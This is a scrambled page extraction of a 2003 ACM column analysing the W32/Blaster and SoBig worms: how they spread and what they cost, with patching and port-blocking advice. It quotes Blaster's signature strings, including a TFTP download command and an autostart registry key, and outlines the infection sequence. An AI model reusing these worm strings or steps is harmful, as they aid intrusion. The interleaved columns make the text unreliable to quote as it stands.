sign in sign up
<<
Home , Patched (malware), Sobig

Digital Village Hal Berghel

Malware Month August 2003: , W32/, and the month of the millennium.

ugust 2003 is officially and ended the week: W32/Blaster world has its own cluster of vul- the worst month on and SoBig. A brief analysis of nerabilities, although SoBig and record for mal- these two exploits provides con- W32/Blaster were not among A ware according to siderable insight into them. However, Microsoft’s hege- vnunet.com. Of course, the cre- current ’s mony in the desktop/workstation ation and distribution of malware modus operandi. It OS realm makes it the hacker tar- (malicious software) has been on is important to get of choice. a rapid rise for well over a decade. According to Carnegie W32/Blaster Mellon’s CERT Coordination W32/Blaster (aka LovSan, Center (CERT/CC), the number worm_msblast, of reported incidents rose from Win32.Posa, W32Lovsan, six in 1988 (the year of the Mor- MSBLASTER), in its ris worm) to 82,094 in 2002, myriad manifestations, with 76,404 incidents reported is one of those exploits in the first half of 2003 alone. that will go down in the The upward trend is unmistak- annals of Internet hacking as a able and frightening. But this giant thorn in the side of net- past August exceeded everyone’s work security experts. Though wildest expectations and worst the origin of this worm has yet to fears. Mi2g (Mi2g.com) esti- be identified, an 18-year-old Min- mates that $32.8 billion in eco- nesota high school student has con- nomic damages were suffered fessed to the FBI to releasing at least in August 2003—the largest one of the modifications amount in the history of the (W32/Lovesan.worm.b—see the Internet. These losses were table here) that infected more than produced by a variety of 7,000 computers. Overall, more malware. than 1.4 million computers world- The table here, abridged from wide have been affected by all Symantec’s Security Response W32/Blaster varieties since the orig- Center online listing, illustrates emphasize that these exploits are inal infection on August 11, 2003 Windows vulnerabilities. My Windows-centric because Syman- according to Network Associates’ focus in this column is on the two tic is a Windows security software Hackerwatch.org. Figure 1

JASON SCHNEIDER entries in the table that started and appliance vendor. The Unix depicts the daily spread of the

COMMUNICATIONS OF THE ACM December 2003/Vol. 46, No. 12 15 Digital Village

As bad as W32/Blaster was, it paled in terms of the number of computers affected by Sobig, which at its peak accounted for nearly 75% of all traffic on the Internet. infection during the week of covered this variant of the worm tation of Remote Procedure Call August 11. The pattern is unfor- used a hard-coded download link (RPC). More specifically, the gettable and alarming. to www.t33kid.com to download enabling vulnerability was a defect However, the consequences of the primary malware executables. in Microsoft’s interface between its the W32/Blaster family of worms Internet registries linked this site Window’s Distributed Component go far beyond the world of the to “teekid” who, at the time this Object Model (DCOM) and RPC Minnesota teenager. According to column was written (fall 2003), in Windows NT, 2000, XP, and Computerworld, “The W32/Blaster faced 10 years in prison and a 2003 Server. Like many OS ven- worm may have contributed to $250,000 fine. dors, Microsoft succumbed to the the cascading effect of the August So how does the W32/Blaster bête noir of modern programming: 14 blackout, government and family of worms work? The ulti- sloppy code. In this case, yet industry experts revealed….On mate objective was to launch a another instance of inadequate the day of the blackout, bounds checking lead to the Blaster degraded the per- reoccurrence of the now- formance of several com- familiar buffer overflow cate- munications lines linking gory of vulnerabilities. key data centers used by I’ve discussed buffer over- utility companies to man- flows in previous columns age the power grid….” (“The Worm,” (Computerworld, Aug. 29, Dec. 2001), so I won’t go 2003). Some have sug- into detail here but to say gested that Blaster inter- the typical OS inserts fered with the network buffers in stream with exchange of flow-control instructions when it builds and load-balancing infor- the execution stack. Thus, Figure 1. The spread of W32/ mation the power grid control Blaster-Lovsan during the week of the full word after the last line of systems require to coordinate Aug. 11, 2003. Note the peak of 68,000 the buffer is presumed to be either responses to grid anomalies. newly infected IP addresses at 11 p.m. on an instruction, or a pointer Monday, Aug. 11. Source: Hackerwatch.org While Blaster hasn’t been blamed (hackerwatch.org/checkup/graph.asp). thereto. If one can overflow a for the cascading blackout, some buffer (made possible by a lack of industry analysts have stated that bounds checking on the input “it certainly compounded the port 80 (the primary port for the data), one can substitute a line of problems.” Web) SYN flood distributed errant code (or pointer) into the The final word on the fate of denial-of-service attack against instruction sequence that can the Minnesota high school stu- Microsoft’s windowsupdate.com serve as an access point for an dent-cum-script kiddie has yet to site on August 16, 2003 based on a exploit. One common variation of be written. According to the vulnerability discovered a month this hack is to put in a pointer Kansas City Star, Microsoft dis- earlier in the Windows implemen- right after the buffer’s end that

16 December 2003/Vol. 46, No. 12 COMMUNICATIONS OF THE ACM points back into the previous at the end of this column for port Some of the code strings that buffer which has been overwritten listings). Port 135 is the port used suggest W32/Blaster infection with a “no op” sled followed by by Microsoft to support RPC and include those shown in Figure 2. rogue code. In this case, one does- Windows Messenger, among The point is this. Even if one did n’t need know the exact location other things. Blaster begins its not patch one’s computer as of the rogue code in the buffer, as the OS will hop through the no DATE EXPLOIT TYPE TARGET OF ATTACK op commands until it reaches the August 11 W32.Blaster.Worm worm Windows DCOM RPC August 11 .WinShell.50.b Windows OS first line of executable code. That August 12 W32.Randex.E worm/trojan Windows/Internet Relay Chat line of code launches the exploit. August 12 W32.HLLW.Habrack worm Windows file sharing networks August 13 W32.Blaster.B.Worm worm Windows DCOM RPC In this case, since Microsoft’s August 13 W32.Blaster.C.Worm worm Windows DCOM RPC DCOM runs with local system August 13 VBS.Lembra@mm worm Microsoft Outlook privileges, the rogue code passed August 13 Backdoor.Beasty.H trojan horse Internet Explorer August 14 Backdoor.Graybird.E trojan horse Windows security settings to it through hacked or “crafted” August 14 W32.Kuskus.Worm worm Windows file sharing networks TCP/IP RPC packets will inherit August 14 W32.Randex.F worm Windows/Internet Relay Chat August 14 W32.Randex.G worm Windows/Internet Relay Chat those privileges. RPC is a protocol August 15 W32.Bugsoft worm Microsoft Outlook that enables cross-platform, inter- August 15 PWSteal.Lemir.C trojan horse Windows online games process communication. So if a August 15 Trojan.Analogx trojan horse Windows spoofed proxy server August 16 W32.HLLW.SShydy.B worm Windows file sharing networks crafted RPC packet from a hostile August 16 W32.Randex.H worm Windows/Internet Relay Chat computer can corrupt the target’s August 16 W32.Dumaru@mm worm/trojan Windows/Internet Relay Chat DCOM, the hostile computer can August 16 BAT.Randren virus Windows OS August 18 W32..Worm worm Windows DCOM RPC and IIS take over control of the target. August 18 W32.Dinkdink.Worm worm Windows DCOM RPC Microsoft released a technical August 18 W32.Sobig.F@mm worm SMTP mass mailing worm bulletin and patch on July 16, August 11–18, 2003: The bleakest 2003 that addressed the vulnera- work by port scanning computers week of malware month. bility. But a patch only fixes the to identify open TCP 135 ports problem if it is installed. Therein and, if found, deposits a variation lies the rub. The evidence sug- of the trojan horse program Microsoft recommended, the data gests there were at least 1.4 mil- dcom.c which, in turn, executes a in the previous paragraph is more lion computer users who didn’t remote shell on TCP port 4444 to than enough to prevent the bother to install the patch. Of one of the compromised comput- exploit from taking root. For course, one could have protected ers that warehouse the exploit. example, leaving Microsoft’s one’s computer even without the The warehouse computer then Server Message Block and Net- patch if one only knew how the initiates a TFTP session request Bios ports (135–139, 445) open is exploit worked. But fewer people on UDP port 69, whereupon the inherently risky. Standard security read Microsoft’s technical bulletin target computer opens TFTP and policy dictates closing them to all than installed the patch. The situ- downloads the actual malware. traffic at the , or in the OS ation migrated from bad to worse The Windows registry is then if no firewall is present. in a hurry. modified to autostart the exploit. In addition, blocking the The W32/Blaster infection At that point, the infected com- ephemeral port 4444 prevents the sequence was pretty straightfor- puter becomes an unwilling initial shell script from executing. ward. The hacking relay sites use repeater in the distributed denial- Ephemeral ports are negotiated basic port scanning to find TCP of-service attack against the win- between client and server, so block- Ports 135 open (see “URL Pearls” dowsupdate.com site. ing one should have no ill effect.

COMMUNICATIONS OF THE ACM December 2003/Vol. 46, No. 12 17 Digital Village

Another factor is that Blaster uses of “most damaging malware in the unsuspecting subject whose its own Trivial File Transfer Proto- history” ($14.62 billion), surpass- email address is contained in one col (TFTP) on TCP/UDP Port 69 ing ($13.94 billion) and of the files on the compromised to download the exploit. TFTP is Love Bug ($8.75 billion) accord- host who subsequently receives an inherent vulnerability, and so ing to the Mi2g SIPS database. hate email from the next target this port should be blocked any- Unlike W32/Blaster, the SoBig downstream. way. Finally, recognition of dcom.c worm relies on email for propaga- Here’s how it works. SoBig and many of the code signatures tion. The ubiquity of email makes sends out an email message with a was already included in the major SoBig especially pernicious. worm in what appears to be a anti-virus programs prior to SoBig’s modus operandi is a tech- harmless attachment. Relying on August 11. The lesson to be nique called “email spoofing,” four fundamental principles of learned from W32/Blaster is that where the email addresses are hacker social engineering, the one really had to have one’s head “harvested” from target files with spoofed email encourages the in the sand to get infected in the the following extensions: .dbx, unsuspecting recipient to open the first place. .eml, .hlp, .htm, .html, .mht, attachment: 1) the email comes .wab, and .txt. The email harvest- from an authentic email host SoBIG ing is performed with any of a (stolen from the previous victim’s

As bad as W32/Blaster (the primary executable of the exploit) files); 2) the email uses was, it paled in terms I just want to say LOVE YOU SAN!! innocuous-seeming sub- billy gates why do you make this possible ? Stop of the number of com- making money and fix your software!! ject lines like “Details,” puters affected by windowsupdate.com “Approved,” “Thank start %s Sobig (aka tftp -i %s GET %s You!,” (and “Re: Thank W32.Sobig.X@mm, %d.%d.%d.%d You!”) “Your Applica- %i.%i.%i.%i where X is one of the BILLY tion,” and of course pro- windows auto update alphabet varieties). SOFTWARE\Microsoft\Windows\CurrentVersion\Run forma variations for the According to curious and devil-may- vnunet.com, at its peak care among us such as SoBig accounted for nearly 75% Figure 2. Example code indicating “Wicked screensaver” and “That of all email traffic on the Internet. infection. Movie;” 3) the email contains Vnunet adds that any one of the non-threatening message bodies top four viruses and worms dis- number of simple approximate like “Please see the attached file in August 2003 would in string matching algorithms in the for details”; 4) and the attach- itself have been the most signifi- public domain. These harvested ments use harmless file names that cant exploit in an average month. email addresses on the compro- appear to be non-executable such To have four in one month, mised host are then used as as your_document.pif, docu- including W32/Blaster and SoBig, return-addresses in subsequent ment_all.pif, details.pif, and nearly brought some areas of the mass mailings. SoBig also relies wicked_scr.scr. Added together, commercial Internet to a grinding on its own internal SMTP mail the social engineering was obvi- halt. SoBig accounted for nearly server to propagate itself, so it ously quite successful. 50% of the August 2003 malware doesn’t have to concern itself When the attachment-cum- exploits reported by many anti- about tightened security measures worm executes, it loads itself in virus vendors. on the local SMTP servers. In this the Windows installation folder as To make matters worse, SoBig way, SoBig also produces two vic- the 72K executable winppr32.exe has achieved the hacker holy grail tims: the compromised host and along with a datafile winstt32.dat.

18 December 2003/Vol. 46, No. 12 COMMUNICATIONS OF THE ACM The worm/install routine links Conclusion sonable security policies for this executable to the Windows If there’s a single lesson in this, Windows computers. Remem- registry by adding new values to it’s that eternal vigilance is the ber the eight M’s: Malware registry keys within the best defense against malware. month of the millennium made HKEY_LOCAL_MACHINE Malware month didn’t have to monkeys of many more than and HKEY_CURRENT_USER happen—the techniques used in Microsoft. c registry groups so that the the two most prominent winppr32.exe autostarts, all of exploits covered here involved Hal Berghel (www.acm.org/hlb) is a which leave behind easily nothing particularly innovative. professor and director of the School of Computer Science and director of the Center detectable hacker trails that form Both were easily preventable by for Cybermedia Research at the University of the signatures used by the anti- maintaining Windows update Nevada, Las Vegas. virus software and intrusion patches and hotfixes provided by detection systems. Microsoft and by following rea- © 2003 ACM 0002-0782/03/1200 $5.00

worst month in history for virus and worm infection is URL PEARLS available at www.vnunet.com/News/1143336, and The intellectual magnet for for the www.vnunet.com/News/1143129. past 15 years has been CERT/CC, a federally funded The economic losses due to malware reported here research center at Carnegie Mellon University. Origi- are calculated by Mi2g (Mi2g.com) and reported on the nally a free-standing DARPA project, CERT/CC is now Net-security Web site (net-security.org). part of the University’s Software Engineering Insti- Another site to visit is Hackerwatch.org, which tute’s Networked Systems Survivability Program. The seems to be affiliated with or sponsored by McAfee CERT/CC Web site (www.cert.org/nav/index_ Security of McAfee anti-virus renown. Special atten- main.html) is one of two core sites for anyone inter- tion should be given to their animation of the spread ested in vulnerabilities, incident han- of W32/Blaster_LovSan—a clever way of depicting the dling, and reporting. The other mission-critical site is spread of the exploit. Their event maps are also of SANS Internet Storm Center (isc.sans.org/)—a virtual interest. cornucopia of data, references, analyses, and alerts. There are several databases of Internet port usage. Taken together, CERT/CC and SANS ISC are the points You might find our version at ccr.i2.nscee.edu/port to of first contact for network intrusion and detection be easier to use than most, so you might begin there to specialists. learn the nuances about Internet ports and services. It Semantec is one of the leading providers of Win- should be noted that the assignment of ports to ser- dows security software in the computer industry. Its vices is based on an honor system to which the Security Response Center (securityresponse.syman- do not subscribe. tec.com/avcenter/vinfodb.html) contains up-to-date Finally, technical information on the two exploits information on known exploits, with links to vendor discussed here can be found on Carnegie Mellon’s CERT alerts, patches, and hotfixes. Web site—Sobig.F Worm: The Kansas City Star coverage of www.cert.org/incident_notes/IN-2003-03.html; W32/Lovesan.worm.b is available at W32/Blaster worm—www.cert.org/advisories/CA- www.kansascity.com/mld/kansascity/news/break- 2003-20.html. ing_news/6655970.htm. Similar information is also available on Windows Vnunet.com’s assessment of August, 2003 as the security vendor’s sites and SANS.ORG. c

COMMUNICATIONS OF THE ACM December 2003/Vol. 46, No. 12 19